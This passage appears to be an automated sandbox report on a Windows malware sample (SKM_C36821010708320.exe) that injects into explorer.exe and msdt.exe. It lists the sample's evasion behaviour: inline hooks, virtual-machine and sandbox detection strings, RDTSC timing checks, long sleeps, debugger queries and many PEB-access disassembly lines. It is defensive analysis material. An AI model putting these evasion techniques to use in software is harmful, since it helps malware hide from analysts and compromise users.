          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_030167AE push 0000003Ah; retf 6_2_030167B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03006C46 push edi; iretd 6_2_03006C4E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03000C7A push ebp; retf 6_2_03000C7E
          Source: initial sampleStatic PE information: section name: .text entropy: 7.22890252229

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SKM_C36821010708320.exe PID: 4740, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000030098E4 second address: 00000000030098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003009B4E second address: 0000000003009B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 3348Thread sleep time: -53710s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exe TID: 2336Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5864Thread sleep count: 49 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5864Thread sleep time: -98000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.255084026.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000003.00000002.579768204.0000000004DF3000.00000004.00000001.sdmpBinary or memory string: 1efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
          Source: explorer.exe, 00000003.00000002.581023913.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.255419635.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.255520845.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.248127457.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000003.00000000.254740981.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508E539 mov eax, dword ptr fs:[00000030h]6_2_0508E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0504A537 mov eax, dword ptr fs:[00000030h]6_2_0504A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098D34 mov eax, dword ptr fs:[00000030h]6_2_05098D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05003D43 mov eax, dword ptr fs:[00000030h]6_2_05003D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05043540 mov eax, dword ptr fs:[00000030h]6_2_05043540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD849B mov eax, dword ptr fs:[00000030h]6_2_04FD849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE746D mov eax, dword ptr fs:[00000030h]6_2_04FE746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]6_2_050905AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050905AC mov eax, dword ptr fs:[00000030h]6_2_050905AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA44B mov eax, dword ptr fs:[00000030h]6_2_04FFA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov ecx, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046DC9 mov eax, dword ptr fs:[00000030h]6_2_05046DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFBC2C mov eax, dword ptr fs:[00000030h]6_2_04FFBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]6_2_0508FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]6_2_0508FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]6_2_0508FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508FDE2 mov eax, dword ptr fs:[00000030h]6_2_0508FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05078DF1 mov eax, dword ptr fs:[00000030h]6_2_05078DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]6_2_0509740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]6_2_0509740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509740D mov eax, dword ptr fs:[00000030h]6_2_0509740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081C06 mov eax, dword ptr fs:[00000030h]6_2_05081C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]6_2_05046C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]6_2_05046C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]6_2_05046C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046C0A mov eax, dword ptr fs:[00000030h]6_2_05046C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]6_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E0 mov eax, dword ptr fs:[00000030h]6_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]6_2_04FF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]6_2_04FF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF1DB5 mov eax, dword ptr fs:[00000030h]6_2_04FF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]6_2_0505C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505C450 mov eax, dword ptr fs:[00000030h]6_2_0505C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF35A1 mov eax, dword ptr fs:[00000030h]6_2_04FF35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]6_2_04FFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFFD9B mov eax, dword ptr fs:[00000030h]6_2_04FFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]6_2_04FC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]6_2_04FC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]6_2_04FC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]6_2_04FC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC2D8A mov eax, dword ptr fs:[00000030h]6_2_04FC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]6_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]6_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]6_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581 mov eax, dword ptr fs:[00000030h]6_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]6_2_04FEC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEC577 mov eax, dword ptr fs:[00000030h]6_2_04FEC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE7D50 mov eax, dword ptr fs:[00000030h]6_2_04FE7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]6_2_04FF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]6_2_04FF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF4D3B mov eax, dword ptr fs:[00000030h]6_2_04FF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD3D34 mov eax, dword ptr fs:[00000030h]6_2_04FD3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCAD30 mov eax, dword ptr fs:[00000030h]6_2_04FCAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098CD6 mov eax, dword ptr fs:[00000030h]6_2_05098CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050814FB mov eax, dword ptr fs:[00000030h]6_2_050814FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]6_2_05046CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]6_2_05046CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05046CF0 mov eax, dword ptr fs:[00000030h]6_2_05046CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]6_2_0509070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0509070D mov eax, dword ptr fs:[00000030h]6_2_0509070D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]6_2_0505FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FF10 mov eax, dword ptr fs:[00000030h]6_2_0505FF10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF16E0 mov ecx, dword ptr fs:[00000030h]6_2_04FF16E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD76E2 mov eax, dword ptr fs:[00000030h]6_2_04FD76E2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF36CC mov eax, dword ptr fs:[00000030h]6_2_04FF36CC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05098F6A mov eax, dword ptr fs:[00000030h]6_2_05098F6A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]6_2_04FEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]6_2_04FEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]6_2_04FEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]6_2_04FEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FEAE73 mov eax, dword ptr fs:[00000030h]6_2_04FEAE73
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD766D mov eax, dword ptr fs:[00000030h]6_2_04FD766D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]6_2_05047794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]6_2_05047794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05047794 mov eax, dword ptr fs:[00000030h]6_2_05047794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD7E41 mov eax, dword ptr fs:[00000030h]6_2_04FD7E41
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCE620 mov eax, dword ptr fs:[00000030h]6_2_04FCE620
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]6_2_04FFA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFA61C mov eax, dword ptr fs:[00000030h]6_2_04FFA61C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050037F5 mov eax, dword ptr fs:[00000030h]6_2_050037F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]6_2_04FCC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]6_2_04FCC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCC600 mov eax, dword ptr fs:[00000030h]6_2_04FCC600
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF8E00 mov eax, dword ptr fs:[00000030h]6_2_04FF8E00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081608 mov eax, dword ptr fs:[00000030h]6_2_05081608
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507FE3F mov eax, dword ptr fs:[00000030h]6_2_0507FE3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]6_2_0508AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508AE44 mov eax, dword ptr fs:[00000030h]6_2_0508AE44
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD8794 mov eax, dword ptr fs:[00000030h]6_2_04FD8794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0505FE87 mov eax, dword ptr fs:[00000030h]6_2_0505FE87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDFF60 mov eax, dword ptr fs:[00000030h]6_2_04FDFF60
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050446A7 mov eax, dword ptr fs:[00000030h]6_2_050446A7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]6_2_05090EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]6_2_05090EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05090EA5 mov eax, dword ptr fs:[00000030h]6_2_05090EA5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDEF40 mov eax, dword ptr fs:[00000030h]6_2_04FDEF40
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0507FEC0 mov eax, dword ptr fs:[00000030h]6_2_0507FEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05008EC7 mov eax, dword ptr fs:[00000030h]6_2_05008EC7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFE730 mov eax,